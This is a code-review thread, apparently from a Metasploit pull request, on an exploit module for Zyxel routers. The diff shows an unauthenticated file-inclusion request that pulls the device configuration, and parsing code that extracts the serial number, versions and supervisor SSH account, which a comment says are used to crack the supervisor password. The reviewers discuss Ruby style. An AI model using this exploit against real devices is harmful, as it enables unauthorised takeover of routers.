modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb

```diff
@@ -0,0 +1,305 @@
+            }
+          ],
+          [
+            'Interactive SSH',
+            {
+              'DefaultOptions' => {
+                'PAYLOAD' => 'generic/ssh/interact'
+              },
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'ssh_interact'
+                }
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  def get_configuration
+    # Get the device configuration by exploiting the LFI vulnerability
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/Export_Log?/data/zcfg_config.json')
+    })
+  end
+
+  def process_configuration(res)
+    # Initiate the hash_config
+    hash_config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }
+    # Parse the device configuration json file
+    begin
+      res_json = res.get_json_document
+    rescue JSON::ParserError => e
+      print_error(Failure::Unknown, "Unable to parse the JSON response. Error: #{e}")
+      return hash_config
+    end
+    if res_json.nil? || res_json.blank?
+      print_error(Failure::NotFound, 'No device configuration file found.')
+      return hash_config
+    end
+    # process json output and retrieve information about supervisor user, ssh port and ssh WAN service status
+    # Also grab hardware and software version including the serial number to crack weak AES encrypted password of user supervisor
+
+    hash_config['hardware'] = res_json['DeviceInfo']['HardwareVersion'] if !res_json.dig('DeviceInfo', 'HardwareVersion').nil?
+    hash_config['software'] = res_json['DeviceInfo']['SoftwareVersion'] if !res_json.dig('DeviceInfo', 'SoftwareVersion').nil?
+    hash_config['serial'] = res_json['DeviceInfo']['SerialNumber'] if !res_json.dig('DeviceInfo', 'SerialNumber').nil?
+
+    if !res_json.dig('X_ZYXEL_LoginCfg', 'LogGp').nil?
+      res_json['X_ZYXEL_LoginCfg']['LogGp'].map do |login|
+        if !login['Account'].nil? && hash_config['ssh_user'] != 'supervisor'
+          login['Account'].map do |account|
+            if account['Username'] == 'supervisor'
+              hash_config['ssh_user'] = account['Username']
+              break
+            end
+          end
+        else
+          break
+        end
```

Comment:
Using a guard would be cleaner.

```suggestion
        break if login['Account'].nil? || hash_config['ssh_user'] == 'supervisor'

        login['Account'].map do |account|
          if account['Username'] == 'supervisor'
            hash_config['ssh_user'] = account['Username']
            break
          end
        end
```

Also the use of `map` is suspicious here as the result of the loop is not assigned to anything. Seems like `.map` was meant to be `.each`. (Although there is likely a way to rewrite this logic more cleanly using `map` or `accept`.)

Reply:
Wouldn't something like `hash_config['ssh_user'] = (acct = login['Account'].find {|a| a['Username'] == 'supervisor'}) ? acct['Username'] : nil` be a bit leaner, or am i missing something in the logic?

Reply:
Updated based on suggestion. Used `select` instead of `accept` because i got a `NoMethod` error. See https://github.com/rapid7/metasploit-framework/pull/17881/commits/de9cd59ea5bd3348a4dcdc6eb0f0c398cd89d9a7